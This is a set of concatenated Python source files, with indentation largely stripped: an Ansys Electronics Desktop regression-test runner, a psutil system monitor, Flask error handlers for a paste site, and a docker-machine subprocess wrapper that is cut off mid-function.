"""Copy static web parts (HTML, CSS, JS).
        Mutate ``self.report_data``: set the status of every project to ``'queued'`` and
        initialize the default link and delta.
"""
if self.results_path.exists():
remove_tree(str(self.results_path))
copy_path_to(str(MODULE_DIR / "static" / "css"), str(self.results_path))
copy_path_to(str(MODULE_DIR / "static" / "js"), str(self.results_path))
self.report_data["all_delta"] = 1 if not self.only_reference else None
self.report_data["projects"] = {}
for project_name, project_config in self.project_tests_config.items():
self.report_data["projects"][project_name] = {
"cores": project_config["distribution"]["cores"],
"status": "queued",
"link": None,
"delta": None,
"time": time_now(),
}
if not self.only_reference:
# initialize integer for proper rendering
self.report_data["projects"][project_name]["delta"] = 0
self.render_main_html()
def render_main_html(self, finished: bool = False) -> None:
"""Renders main report page.
Using ``self.report_data`` updates django template with the data.
Parameters
----------
finished : bool, default=False
When True send a context to stop refreshing the HTML page.
"""
ctx = {
"projects": self.report_data["projects"],
"finished": finished,
"all_delta": self.report_data["all_delta"],
"has_reference": not self.only_reference,
}
data = MAIN_PAGE_TEMPLATE.render(context=ctx)
with open(self.results_path / "main.html", "w") as file:
file.write(data)
def render_project_html(self, project_name: str, project_report: Dict[str, Union[List[Any], int]]) -> None:
"""Renders project report page.
Creates new page if none exists.
Updates django template with XY plots, mesh, etc data.
Parameters
----------
project_name : str
Name of the project to render.
project_report : dict
Data to render on plots.
"""
page_ctx = {
"plots": project_report["plots"],
"project_name": project_name,
"errors": project_report["error_exception"],
"mesh": project_report["mesh"],
"sim_time": project_report["simulation_time"],
"slider_limit": project_report["slider_limit"],
"has_reference": not self.only_reference,
}
data = PROJECT_PAGE_TEMPLATE.render(context=page_ctx)
with open(self.results_path / f"{project_name}.html", "w") as file:
file.write(data)
def task_runner(
self, project_name: str, project_path: str, project_config: Dict[str, Any], allocated_machines: Dict[str, Any]
) -> None:
"""Task runner that is called by each thread.
Mutates ``self.report_data["projects"]`` and ``self.machines_dict``
Calls update of HTML pages status, starts AEDT process, calls render of project_name.html
Parameters
----------
project_name : str
Name of the project to start.
project_path : str
Path to the project.
project_config : dict
Configuration of project, distribution, etc.
allocated_machines : dict
Machines and cores that were allocated for this task.
"""
self.report_data["projects"][project_name]["time"] = time_now()
self.report_data["projects"][project_name]["status"] = "running"
self.render_main_html()
execute_aedt(
self.version,
self.script,
self.script_args,
project_path,
allocated_machines,
distribution_config=project_config["distribution"],
)
logger.debug(f"Project {project_name} analyses finished. Prepare report.")
# return cores back
for machine in allocated_machines:
self.machines_dict[machine] += allocated_machines[machine]["cores"]
project_report = self.prepare_project_report(project_name, project_path)
self.render_project_html(project_name, project_report)
status = "success" if not project_report["error_exception"] else "fail"
self.report_data["projects"][project_name].update(
{
"link": f"{project_name}.html",
"delta": project_report["slider_limit"],
"time": time_now(),
"status": status,
}
)
self.render_main_html()
self.active_tasks -= 1
def prepare_project_report(self, project_name: str, project_path: str) -> Dict[str, Union[List[Any], int]]:
"""Prepare project report dictionary that is required by ``render_project_html()``.
Parameters
----------
project_name : str
Name of the project.
project_path : str
Path to the project.
Returns
-------
project_report : dict
project report dictionary that is required by ``render_project_html()``.
"""
report_file = Path(project_path).parent / f"{project_name}.json"
project_report: Dict[str, Union[List[Any], Any]] = {
"plots": [],
"error_exception": [],
"mesh": [],
"simulation_time": [],
"slider_limit": 0,
}
project_data = self.check_all_results_present(project_report["error_exception"], report_file, project_name)
if project_report["error_exception"]:
# some keys are missing
return project_report
try:
copy_path_to(str(report_file), str(self.results_path / "reference_folder"))
project_report["error_exception"] += project_data["error_exception"]
for design_name, design_data in project_data["designs"].items():
# get mesh data
self.extract_mesh_or_time_data("mesh", design_data, design_name, project_name, project_report)
# get simulation time
self.extract_mesh_or_time_data(
"simulation_time", design_data, design_name, project_name, project_report
)
# extract XY curve data
self.extract_curve_data(design_data, design_name, project_name, project_report)
except Exception as exc:
project_report["error_exception"].append(str(exc))
return project_report
def check_all_results_present(
self, project_exceptions: List[str], report_file: Path, project_name: str
) -> Dict[str, Any]:
"""Check that report file exists.
Check that project report exists in reference data.
Check that all keys present in the reference data are also in the current run data.
Check that all keys present in the current run data are also in the reference data.
Parameters
----------
project_exceptions : list
List to append with errors.
report_file : Path
JSON file path with results.
project_name : str
Name of the project.
Returns
-------
project_data : dict
Dictionary loaded from .json file.
"""
project_data: Dict[str, Any] = {}
if not report_file.exists():
project_exceptions.append(f"Project report for {project_name} does not exist")
return project_data
with open(report_file) as file:
project_data = json.load(file)
if not self.only_reference:
if project_name not in self.reference_data["projects"]:
project_exceptions.append(f"Project report for {project_name} does not exist in reference file")
else:
compare_keys(
self.reference_data["projects"][project_name],
project_data,
exceptions_list=project_exceptions,
results_type="reference",
)
compare_keys(
project_data,
self.reference_data["projects"][project_name],
exceptions_list=project_exceptions,
results_type="current",
)
return project_data
def extract_curve_data(
self,
design_data: Dict[str, Any],
design_name: str,
project_name: str,
project_report: Dict[str, Union[List[Any], Any]],
) -> None:
"""Extract all XY curves for a particular design.
Mutate ``project_report``.
Parameters
----------
design_data : dict
All the data related to a single design in project_name.
design_name : str
Name of the design.
project_name : str
Name of the project.
project_report : dict
Project report dictionary that is required by 'render_project_html()'.
"""
for report_name, report_data in design_data["report"].items():
for trace_name, trace_data in report_data.items():
for curve_name, curve_data in trace_data["curves"].items():
plot_data = {
"name": f"{design_name}:{report_name}:{trace_name}:{curve_name}",
"id": unique_id(),
"x_label": f'"{trace_data["x_name"]} [{trace_data["x_unit"]}]"',
"y_label": f'"[{trace_data["y_unit"]}]"',
"x_axis": curve_data["x_data"],
"version_ref": -1,
"y_axis_ref": [],
"version_now": str(self.version),
"y_axis_now": curve_data["y_data"],
"diff": [],
"delta": -1,
}
if not self.only_reference:
y_ref_data = self.reference_data["projects"][project_name]["designs"][design_name]["report"][
report_name
][trace_name]["curves"][curve_name]["y_data"]
if len(y_ref_data) != len(curve_data["y_data"]):
msg = (
f"Number of trace points in reference data [{len(y_ref_data)}] isn't equal to "
f"number in current data [{len(curve_data['y_data'])}]"
)
project_report["error_exception"].append(msg)
continue
max_delta = 0
difference = []
for ref, actual in zip(y_ref_data, curve_data["y_data"]):
difference.append(ref - actual)
if actual != 0:
# if 0, just skip, no sense for 'infinite' delta
max_delta = max(max_delta, abs(1 - ref / actual))
max_delta_perc = round(max_delta * 100, 3)
                        # always use an integer since slider ticks are integers; +1 leaves room to slide past the max delta
project_report["slider_limit"] = max(project_report["slider_limit"], int(max_delta_perc) + 1)
plot_data.update(
{
"version_ref": self.reference_data["aedt_version"],
"y_axis_ref": y_ref_data,
"diff": difference,
"delta": max_delta_perc,
}
)
project_report["plots"].append(plot_data)
def extract_mesh_or_time_data(
self,
key_name: str,
design_data: Dict[str, Any],
design_name: str,
project_name: str,
project_report: Dict[str, Union[List[Any], Any]],
) -> None:
"""Extract mesh or simulation time information.
Mutate project_report.
Parameters
----------
key_name : str
Mesh or simulation_time, depending on what to extract.
design_data : dict
All the data related to a single design in ``project_name``.
design_name : str
Name of the design.
project_name : str
Name of the project.
project_report : dict
Project report dictionary that is required by ``render_project_html()``.
"""
for variation_name, variation_data in design_data[key_name].items():
for setup_name, current_stat in variation_data.items():
stat_dict = {
"name": f"{design_name}:{setup_name}:{variation_name}",
"current": current_stat,
}
if not self.only_reference:
reference_dict = self.reference_data["projects"][project_name]["designs"][design_name][key_name]
if variation_name not in reference_dict:
project_report["error_exception"].append(
f"Variation ({variation_name}) wasn't found in reference results for design: {design_name}"
)
continue
stat_dict["ref"] = reference_dict[variation_name][setup_name]
project_report[key_name].append(stat_dict)
def allocator(self) -> Iterable[Tuple[str, Dict[str, Dict[str, int]]]]:
"""Generator that yields resources.
Waits until resources are available.
Yields
------
proj_name : str
Name of the project.
allocated_machines : Dict
Allocated machines.
"""
sorted_by_cores_desc = sorted(
self.project_tests_config.keys(),
key=lambda x: self.project_tests_config[x]["distribution"]["cores"],
reverse=True,
)
proj_name = ""
while sorted_by_cores_desc:
if self.active_tasks >= self.max_tasks:
logger.debug("Number of maximum tasks limit is reached. Wait for job to finish")
sleep(4)
continue
allocated_machines = None
for proj_name in sorted_by_cores_desc:
                # First try to fit the whole job on a single node for stability. Projects are
                # sorted by core count (descending), which keeps resource utilization high.
allocated_machines = allocate_task_within_node(
self.project_tests_config[proj_name]["distribution"], self.machines_dict
)
if allocated_machines:
break
else:
for proj_name in sorted_by_cores_desc:
                    # no single machine can fit the whole project, so split it across machines
allocated_machines = allocate_task(
self.project_tests_config[proj_name]["distribution"], self.machines_dict
)
if allocated_machines:
break
else:
msg = "Waiting for resources. Cores left per machine:\n"
for machine, cores in self.machines_dict.items():
msg += f"{machine} has {cores} core(s) free\n"
logger.debug(msg)
sleep(5)
if allocated_machines:
for machine in allocated_machines:
self.machines_dict[machine] -= allocated_machines[machine]["cores"]
sorted_by_cores_desc.remove(proj_name)
self.active_tasks += 1
yield proj_name, allocated_machines
def allocate_task(
distribution_config: Dict[str, int], machines_dict: Dict[str, int]
) -> Optional[Dict[str, Dict[str, int]]]:
"""Allocate task on one or more nodes.
Will use MPI and split the job.
If multiple parametric tasks are defined, distribute uniformly.
Parameters
----------
distribution_config : dict
Data about required distribution for the project.
machines_dict : dict
All available machines in pool.
Returns
-------
dict
Allocated machines for the project or ``None`` if not allocated.
"""
if distribution_config.get("single_node", False):
return None
allocated_machines = {}
tasks = distribution_config.get("parametric_tasks", 1)
cores_per_task = int(distribution_config["cores"] / tasks)
to_fill = distribution_config["cores"]
for machine, cores in machines_dict.items():
if tasks == 1:
allocate_cores = cores if to_fill - cores > 0 else to_fill
allocate_tasks = 1
else:
            # if parametric tasks are specified, we cannot allocate fewer cores than cores_per_task
if cores < cores_per_task:
continue
allocate_tasks = min((cores // cores_per_task, tasks))
tasks -= allocate_tasks
allocate_cores = cores_per_task * allocate_tasks
allocated_machines[machine] = {
"cores": allocate_cores,
"tasks": allocate_tasks,
}
to_fill -= allocate_cores
if to_fill <= 0:
break
if to_fill > 0:
# not enough resources
logger.debug("Not enough resources to split job")
return None
return allocated_machines
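# Illustrative example (hypothetical numbers): with machines_dict == {"n1": 8, "n2": 8} and a
# distribution of cores=12, parametric_tasks=4 (3 cores per task), allocate_task() returns
# {"n1": {"cores": 6, "tasks": 2}, "n2": {"cores": 6, "tasks": 2}} and leaves machines_dict
# untouched (the caller subtracts the allocated cores).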
def allocate_task_within_node(
distribution_config: Dict[str, int], machines_dict: Dict[str, int]
) -> Dict[str, Dict[str, int]]:
"""Try to fit a task in a node without splitting.
Parameters
----------
distribution_config : dict
Data about required distribution for the project.
machines_dict : dict
All available machines in pool.
Returns
-------
machines : dict
        Allocated machines for the project, or an empty dict if the task does not fit on a single node.
"""
for machine, cores in machines_dict.items():
if cores - distribution_config["cores"] >= 0:
return {
machine: {
"cores": distribution_config["cores"],
"tasks": distribution_config.get("parametric_tasks", 1),
}
}
return {}
def copy_proj(project_name: str, project_config: Dict[str, Any], dst: str) -> Union[str, List[str]]:
"""Copy project to run location, temp by default.
Parameters
----------
project_name : str
Name of the project to start.
project_config : dict
Configuration of project, distribution, etc.
dst : str
Path where to copy.
Returns
-------
path : str
Location where it was copied.
"""
src = project_config.get("path", project_name + ".aedt")
return copy_path_to(src, dst)
def copy_dependencies(project_config: Dict[str, Any], dst: str) -> None:
"""Copies project dependencies to run location.
Parameters
----------
project_config : dict
Configuration of project, distribution, etc.
dst : str
Path where to copy.
"""
deps = project_config.get("dependencies", None)
if isinstance(deps, list):
for dep in deps:
copy_path_to(dep, dst)
elif isinstance(deps, str):
copy_path_to(deps, dst)
def copy_path_to(src: str, dst: str) -> Union[str, List[str]]:
"""Copy path from src to dst.
If ``src`` is a relative path, preserves relative folder tree.
Parameters
----------
src : str
Path with copy target, relative or absolute.
dst : str
Path where to copy.
Returns
-------
path: str or list
Path to copied file or list with paths if folder is copied.
"""
src_path = Path(src.replace("\\", "/"))
if not src_path.is_absolute() and len(src_path.parents) > 1:
unpack_dst = Path(dst) / src_path.parents[0]
if not src_path.is_file():
unpack_dst /= src_path.name
elif not src_path.is_file():
unpack_dst = Path(dst) / src_path.name
else:
unpack_dst = Path(dst)
src_path = src_path.expanduser().resolve()
if not src_path.exists():
        raise FileNotFoundError(f"File {src_path} doesn't exist")
dst = str(unpack_dst)
mkpath(dst)
if src_path.is_file():
file_path = copy_file(str(src_path), dst)
return file_path[0]
else:
return copy_tree(str(src_path), dst)
def mkdtemp_persistent(*args: Any, persistent: bool = True, **kwargs: Any) -> Any:
"""Provides a context manager to create a temporary/permanent directory depending on 'persistent' argument
Parameters
----------
*args: Any
TemporaryDirectory args
persistent : bool, default=True
If ``True``, create a permanent directory.
**kwargs: Any
TemporaryDirectory keyword arguments.
Returns
-------
tempfile.TemporaryDirectory
Context manager with temp directory from ``tempfile`` module.
"""
if persistent:
@contextmanager
def normal_mkdtemp() -> Iterator[str]:
yield tempfile.mkdtemp(*args, **kwargs)
return normal_mkdtemp()
else:
return tempfile.TemporaryDirectory(*args, **kwargs)
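# Illustrative usage (hypothetical names): keep the run directory only when artifacts should
# be saved, e.g.
#   with mkdtemp_persistent(persistent=save_data, dir=out_dir, prefix="242_") as tmp_dir:
#       ...  # copy projects into tmp_dir and run them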
def generator_unique_id() -> Iterator[str]:
"""Generator that incrementally yields new IDs."""
i = 1
while True:
yield f"a{i}"
i += 1
id_generator = generator_unique_id()
def unique_id() -> str:
"""When called runs generator to pick new unique ID.
Returns
-------
id : str
New ID.
"""
return next(id_generator)
def execute_aedt(
version: str,
script: Optional[str] = None,
script_args: Optional[str] = None,
project_path: Optional[str] = None,
machines: Optional[Dict[str, Any]] = None,
distribution_config: Optional[Dict[str, Any]] = None,
) -> None:
"""Execute single instance of Electronics Desktop.
Parameters
----------
version : str
Version to run.
script : str, optional
Path to the script.
script_args : str, optional
Arguments to the script.
project_path : str, optional
Path to the project.
machines : dict, optional
Machine specification for current job.
distribution_config : dict, optional
Distribution configuration for the job.
"""
aedt_path = get_aedt_executable_path(version)
command = [
aedt_path,
]
if machines is not None:
command.append("-machinelist")
host_list = "list=" + ",".join(
[f"{name}:{conf['tasks']}:{conf['cores']}:90%" for name, conf in machines.items()]
)
command.append(host_list)
if distribution_config and distribution_config.get("distribution_types", None):
command.append("-distributed")
dist_type_str = ",".join([dist_type for dist_type in distribution_config["distribution_types"]])
command.append(f"includetypes={dist_type_str}")
tasks = distribution_config.get("multilevel_distribution_tasks", 0)
if tasks > 0:
command.append("maxlevels=2")
command.append(f"numlevel1={tasks}")
if script is not None:
command += [
"-ng",
"-features=SF6694_NON_GRAPHICAL_COMMAND_EXECUTION",
"-RunScriptAndExit",
script,
]
if script_args is not None:
command += [
"-ScriptArgs",
f'"{script_args}"',
]
if project_path is not None:
log_path = os.path.splitext(project_path)[0] + ".log"
command += [
"-LogFile",
log_path,
project_path,
]
logger.debug(f"Execute {subprocess.list2cmdline(command)}")
    # filter scheduler-related environment variables so AEDT does not think it was submitted by a scheduler
env = {}
filtered = []
for key, val in os.environ.items():
if (
"sge" not in key.lower()
and "slurm" not in key.lower()
and "lsf" not in key.lower()
and "lsb" not in key.lower()
and "pbs" not in key.lower()
and "PE_HOSTFILE" not in key.lower()
):
env[key] = val
else:
filtered.append(key)
logger.debug(f"Variables filtered: {','.join(filtered)}")
logger.debug(f"Variables applied: {env}")
output = subprocess.check_output(command, env=env)
logger.debug(output.decode())
def get_aedt_executable_path(version: str) -> str:
"""Get platform specific Electronics Desktop executable path.
Parameters
----------
version : str
Version of Electronics Desktop.
Returns
-------
path : str
Path to Electronics Desktop executable.
"""
aedt_env = f"ANSYSEM_ROOT{version}"
aedt_path = os.environ.get(aedt_env, None)
if not aedt_path:
raise ValueError(f"Environment variable {aedt_env} is not set.")
if platform.system() == "Windows":
executable = "ansysedt.exe"
elif platform.system() == "Linux":
executable = "ansysedt"
else:
raise SystemError("Platform is neither Windows nor Linux")
aedt_path = os.path.join(aedt_path, executable)
return aedt_path
def time_now() -> str:
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
def compare_keys(
dict_1: Dict[Any, Any],
dict_2: Dict[Any, Any],
exceptions_list: List[str],
*,
dict_path: str = "",
results_type: str = "reference",
) -> None:
"""Compare that keys from ``dict_1`` are present in ``dict_2`` recursively.
Mutates ``exceptions_list`` and appends errors if key is not present.
"""
if dict_path:
dict_path += "->"
for key, val in dict_1.items():
if key not in dict_2:
exceptions_list.append(f"Key '{dict_path}{key}' does not exist in {results_type} results")
continue
if isinstance(val, dict):
compare_keys(val, dict_2[key], exceptions_list, dict_path=f"{dict_path}{key}", results_type="reference")
def parse_arguments() -> argparse.Namespace:
"""Parse CLI arguments.
Returns
-------
args : argparse.Namespace
Validated arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument("--aedt-version", required=True, help="Electronics Desktop version to test, e.g. 221")
parser.add_argument("--config-file", required=True, help="Project config file path")
parser.add_argument("--reference-file", help="Reference results file path")
parser.add_argument("--only-reference", action="store_true", help="Only create reference results")
parser.add_argument(
"--only-validate", action="store_true", help="Only validate current --config-file [and --reference-file]"
)
parser.add_argument(
"--suppress-validation",
action="store_true",
help="Suppress validation of config file and reference file (DANGEROUS)",
)
parser.add_argument(
"--rsm-is-started",
action="store_true",
help="When job uses multiple nodes and user started RSM service on each node manually",
)
parser.add_argument(
"--rsm-path",
help="When job uses multiple nodes tool requires RSM, RSM will be auto-started from provided path",
)
parser.add_argument(
"--out-dir", "-o", help="Output directory for reports and project files (if --save-sim-data set)"
)
parser.add_argument(
"--save-sim-data", "-s", action="store_true", help="Save simulation data under output dir (--out-dir flag)"
)
parser.add_argument("--max-cores", "-c", type=int, help="total number of cores limit", default=99999)
parser.add_argument("--max-tasks", "-t", type=int, help="total number of parallel tasks limit", default=99999)
parser.add_argument("--debug", action="store_true", help="Adds additional DEBUG logs")
cli_args = parser.parse_args()
log_level = 10 if cli_args.debug else 20
set_logger(logging_file=CWD_DIR / "aedt_test_framework.log", level=log_level, pyaedt_module=None)
if not cli_args.only_reference and not cli_args.reference_file:
raise ValueError("Either set --only-reference flag or provide path via --reference-file")
if cli_args.rsm_path and cli_args.rsm_is_started:
raise ValueError("--rsm-is-started and --rsm-path are mutually exclusive")
if cli_args.suppress_validation and cli_args.only_validate:
raise ValueError("--only-validate and --suppress-validation are mutually exclusive")
if not (cli_args.max_cores or cli_args.max_tasks):
logger.warning(
"No limits are specified for current job. This may lead to failure if you lack of license or resources"
)
aedt_version_pattern = re.compile(r"\d\d\d$")
if not aedt_version_pattern.match(cli_args.aedt_version):
raise ValueError("Electronics Desktop version value is invalid. Valid format example: 221")
if not os.path.isfile(cli_args.config_file):
raise ValueError(f"Configuration file does not exist: {cli_args.config_file}")
if cli_args.save_sim_data and not cli_args.out_dir:
raise ValueError("Saving of simulation data was requested but output directory is not provided")
return cli_args
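# Example invocation (the runner script and file names below are illustrative):
#   python <runner_script>.py --aedt-version 221 --config-file config.json \
#       --reference-file reference.json --out-dir ./results --save-sim-data --max-cores 16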
if __name__ == "__main__":
main()
|
monitor.py
|
import raylink
import psutil
import schedule
import threading
import time
from tabulate import tabulate
from psutil._common import bytes2human
import subprocess as sp
import tracemalloc
class HWM(object):
@staticmethod
def add_cap(cap, log):
log = '-' * 20 + f'\n{cap}\n' + '-' * 20 + '\n' + log + '\n'
return log
@staticmethod
def cpu():
log = [['Usage', str(psutil.cpu_percent())],
['Load Avg', ', '.join([str(round(i, 2)) for i in psutil.getloadavg()])]]
log = tabulate(log, tablefmt='presto', colalign=['left', 'right'])
log = HWM.add_cap('CPU', log)
return log
@staticmethod
def mem():
mem = psutil.virtual_memory()
log = []
for name in mem._fields:
value = getattr(mem, name)
if name != 'percent':
value = bytes2human(value)
log.append([name.capitalize(), value])
log = tabulate(log, tablefmt='presto', colalign=['left', 'right'])
log = HWM.add_cap('Memory', log)
return log
@staticmethod
def disk():
disk_info = sp.getoutput('df -h')
lines = disk_info.split('\n')
headers = list(filter(lambda x: x != '', lines[0].split(' ')))
data = []
for l in lines[1:]:
data.append(list(filter(lambda x: x != '', l.split(' '))))
log = tabulate(data, headers=headers, tablefmt='presto')
log = HWM.add_cap('Disk', log)
return log
@staticmethod
def proc():
log = ''
attrs = ['pid', 'ppid', 'cpu_percent', 'memory_percent', 'name', 'cmdline', 'memory_info']
headers = ['pid', 'ppid', 'cpu', 'mem', 'name', 'cmdline']
mem_fields = []
keys = None
data = []
count = 0
for proc in psutil.process_iter():
try:
if proc.memory_info() is None:
continue
            except psutil.Error:
                continue
d = proc.as_dict(attrs=attrs)
d['cmdline'] = ' '.join(d['cmdline'])
            d['cmdline'] = d['cmdline'].strip()
if len(d['cmdline']) > 30:
d['cmdline'] = d['cmdline'][:30] + '...'
            d['name'] = d['name'].strip()
if len(d['name']) > 15:
d['name'] = d['name'][:15] + '...'
d['cpu'] = round(d.pop('cpu_percent'), 2)
d['mem'] = round(d.pop('memory_percent'), 2)
mem = d.pop('memory_info')
for name in mem._fields:
if count == 0:
mem_fields.append(name)
value = getattr(mem, name)
value = bytes2human(value)
d[name] = value
if keys is None:
keys = headers + mem_fields
data.append(dict(zip(keys, [d[k] for k in keys])))
count += 1
cpu_data = sorted(data, key=lambda x: x['cpu'], reverse=True)[:5]
_log = tabulate([list(d.values()) for d in cpu_data], headers=keys,
tablefmt='presto', colalign=['left', 'right'])
log += HWM.add_cap('CPU TOP 5', _log)
mem_data = sorted(data, key=lambda x: x['mem'], reverse=True)[:5]
_log = tabulate([list(d.values()) for d in mem_data], headers=keys, tablefmt='presto')
log += HWM.add_cap('MEM TOP 5', _log)
return log
class TM(object):
def __init__(self):
self.snapshot = None
def start(self):
tracemalloc.start()
def stat(self):
log = ''
snapshot = tracemalloc.take_snapshot()
top_stats = snapshot.statistics('lineno')
log += "[ Top 10 ]\n"
for stat in top_stats[:10]:
log += f'{stat}\n'
if self.snapshot:
top_stats = snapshot.compare_to(self.snapshot, 'lineno')
log += "[ Top 10 differences ]\n"
for stat in top_stats[:10]:
log += f'{stat}\n'
self.snapshot = snapshot
return log
class MemSnapshot(object):
def __init__(self, memory_info, code_info):
self.memory_info = memory_info
self.code_info = code_info
self.attrs = memory_info._fields
@staticmethod
def __calc(al_func, c_func):
def wrapper(a, b):
values = []
for _a in a.attrs:
a_v = getattr(a.memory_info, _a)
b_v = getattr(b.memory_info, _a)
res = al_func(a_v, b_v)
values.append(res)
return MemSnapshot(type(a.memory_info)(*values), c_func(a.code_info, b.code_info))
return wrapper
def __sub__(self, other):
return self.__calc(lambda a, b: a - b, lambda a, b: f'{b} -> {a}')(self, other)
def __add__(self, other):
assert self.code_info == other.code_info
return self.__calc(lambda a, b: a + b, lambda a, b: f'{a}')(self, other)
def __str__(self):
s = []
for a in self.attrs:
value = getattr(self.memory_info, a)
if value < 0:
value = '-' + bytes2human(abs(value))
else:
value = bytes2human(value)
s.append(f'{a}={value}')
return ', '.join(s)
class ProcMem(object):
def __init__(self):
self.p = psutil.Process()
self.p.memory_info()
self.last_snapshot = None
self.diff_stat = {}
def snapshot(self, first=False):
import sys
frame = sys._getframe(1)
code_info = f'{frame.f_code.co_filename}:{frame.f_lineno}'
mem = self.p.as_dict(attrs=['memory_info'])['memory_info']
snapshot = MemSnapshot(mem, code_info)
if not first and self.last_snapshot:
diff = snapshot - self.last_snapshot
if diff.code_info not in self.diff_stat:
self.diff_stat[diff.code_info] = diff
else:
self.diff_stat[diff.code_info] += diff
self.last_snapshot = snapshot
def stat(self):
stat = []
for k, v in self.diff_stat.items():
stat.append(f'{k} {v}')
return '\n'.join(stat)
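# Rough usage sketch for ProcMem (the workload function is hypothetical):
#   pm = ProcMem()
#   pm.snapshot(first=True)   # record a baseline at this call site
#   do_work()                 # hypothetical allocation-heavy step
#   pm.snapshot()             # accumulate the memory delta keyed by the two call sites
#   print(pm.stat())          # e.g. "app.py:10 -> app.py:13 rss=1.2M, vms=..., ..."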
class Telescreen(raylink.OutlineNode):
TYPE = 'telescreen'
def setup(self):
schedule.every(1).minutes.do(self.on_tick)
def run():
while True:
schedule.run_pending()
time.sleep(1)
job_thread = threading.Thread(target=run, daemon=True)
job_thread.start()
def on_tick(self):
log = [HWM.cpu(), HWM.mem(), HWM.disk(), HWM.proc()]
self._llogger.debug('\n' + ''.join(log))
class OldBro(raylink.SuperVillain):
TYPE = 'oldbro'
def setup(self):
raylink.SuperVillain.setup(self, Telescreen)
|
errorhandlers.py
|
import threading
import traceback
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import MarkdownLexer
from flask import url_for, render_template, request, redirect, copy_current_request_context
from flask_wtf.csrf import CSRFError
from flask_mail import Message
from app.util import mail
unknown_error_text = """# Uh Oh!
**Shit really hit the fan. Some sort of unknown error just happened.**"""
not_found_text = """# Not Found
**There doesn't seem to be anything here.**"""
method_not_allowed_text = """# Method Not Allowed
**You can't do that here.**"""
rate_limit_text = """# Too Many Requests
**Limit: {}**"""
csrf_message = """# Bad Request
**{}**"""
def setup_handlers(app):
@app.errorhandler(400)
def bad_request(ex):
if request.headers.get('Accept'):
return '400 missing text', 400, {'Content-type': 'text/plain; charset=utf-8'}
return redirect(url_for('paste.edit', _external=True))
@app.errorhandler(CSRFError)
def missing_csrf(e):
return render_template(
'paste_show.html',
text=highlight(csrf_message.format(e.description), MarkdownLexer(), HtmlFormatter()),
lines=csrf_message.count('\n') + 1
), 400
@app.errorhandler(404)
def not_found(ex):
return render_template(
'paste_show.html',
text=highlight(not_found_text, MarkdownLexer(), HtmlFormatter()),
lines=not_found_text.count('\n') + 1,
), 404
@app.errorhandler(405)
def method_not_allowed(ex):
return render_template(
'paste_show.html',
text=highlight(method_not_allowed_text, MarkdownLexer(), HtmlFormatter()),
lines=method_not_allowed_text.count('\n') + 1,
), 405
@app.errorhandler(429)
def rate_limit(ex):
text = rate_limit_text.format(app.config.get('RATELIMIT_DEFAULT'))
return render_template(
'paste_show.html',
text=highlight(text, MarkdownLexer(), HtmlFormatter()),
lines=text.count('\n') + 1
), 429
@app.errorhandler(500)
@app.errorhandler(Exception)
def unknown_error(ex):
@copy_current_request_context
def send_message(message):
try:
mail.send(message)
except Exception:
pass # Ignore, we're going to log it anyway
tb = traceback.format_exc()
message = Message(
subject=f'Error From {request.host_url}',
recipients=[app.config['MAIL_RECIPIENT']],
body=render_template('email/error.txt.jinja', tb=tb),
html=render_template('email/error.html.jinja', tb=tb)
)
thread = threading.Thread(target=send_message, args=(message,))
thread.start()
app.logger.exception(f'Unknown error at endpoint: {request.method} {request.full_path}')
return render_template(
'paste_show.html',
text=highlight(unknown_error_text, MarkdownLexer(), HtmlFormatter()),
lines=unknown_error_text.count('\n') + 1
), 500
|
cl_api.py
|
import logging
import subprocess
import threading
import time
import os
import queue
import re
from datetime import datetime, timedelta
class DockerMachineError(Exception):
"""
Exception thrown by machine components.
"""
def __init__(self, task, message):
self.task = task
self.message = message
def __str__(self):
return self.message
def __repr__(self):
return "task '%s': %s" % (self.task, self.message)
class DockerStreamReader:
"""
External thread to help pull out text from machine task processes.
NOTE: this extra thread is required, since reading from STDERR and STDOUT could block.
TODO: always wait a little to make sure we do not miss output on tasks that end quickly
"""
ansi_escape = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]')
def __init__(self, stream_in):
self._queue = queue.Queue()
self._stream = stream_in
self._thread = threading.Thread(target=self._reader_thread, daemon=True)
self._thread.start()
def _format_text(self, text):
"""
Remove ANSI colour codes, etc
"""
return self.ansi_escape.sub('', text)
def _reader_thread(self):
"""
Read all data from stream and add to internal readline queue
"""
while not self._stream.closed:
try:
text = self._stream.readline()
if text:
self._queue.put(self._format_text(text.strip('\n')))
else:
time.sleep(1) # wait a little if nothing available
except Exception:
pass
def get_line(self):
"""
Returns next line in reader queue or None.
"""
try:
return self._queue.get(block=False)
except queue.Empty:
return None
def wait(self):
"""
Close stream and wait for thread to stop.
"""
try:
self._stream.close()
self._thread.join(timeout=2)
except Exception:
pass
class DockerMachineTask:
"""
Wrapper for a task process run by machine.
"""
default_bin = 'docker-machine'
default_timeout = 540 # seconds
def __init__(self, name='', cwd='./', bin=None, cmd='', params=[], timeout=None, allowed_to_fail=False, output_cb=None):
"""
:param name: task name
:param cwd: working directry (docker-compose root)
:param cmd: first argument
:param params: command arguments
:param env: environment used for sub-process call
:param timeout: seconds to wait for sub-process call to complete
:param callback: func(task_output_text)
"""
self._name = name
self._cwd = cwd
self._bin = bin or self.default_bin
self._cmd = cmd
self._params = params
self._timeout = timeout or self.default_timeout
self._output_cb = output_cb
if self._output_cb:
self._output = list()
else:
self._output = None
self._returncode = None
self._logger = logging.getLogger(self._name)
self._allowed_to_fail = allowed_to_fail
def __str__(self):
return "%s %s: %d" % (self._bin, self._cmd, self._returncode)
def _process_output(self, stdout_queue, stderr_queue):
"""
Process all output from stream readers.
"""
while True:
stdout = self._stdout_reader.get_line()
if stdout is not None:
stdout_queue.put(stdout)
if self._output is not None:
self._output.append(stdout)
stderr = self._stderr_reader.get_line()
if stderr is not None:
stderr_queue.put(stderr)
if self._output is not None:
self._output.append(stderr)
if not stdout and not stderr:
break
def _finish_output(self, stdout_queue, stderr_queue):
"""
Wait for process to finish and read last bit of output.
"""
self._process.wait()
self._stdout_reader.wait()
self._stderr_reader.wait()
self._process_output(stdout_queue, stderr_queue)
def call(self, env, stdout_queue, stderr_queue):
"""
Call process and block until done.
"""
args = [self._bin, self._cmd] + self._params
self._logger.debug("calling <%s> ...", args)
# call process
self._process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, cwd=self._cwd, text=True)
self._stdout_reader = DockerStreamReader(self._process.stdout)
self._stderr_reader = DockerStreamReader(self._process.stderr)
self._popen_start_time = datetime.now()
self._popen_timeout = timedelta(seconds=self._timeout)
while True:
# poll process for status and output
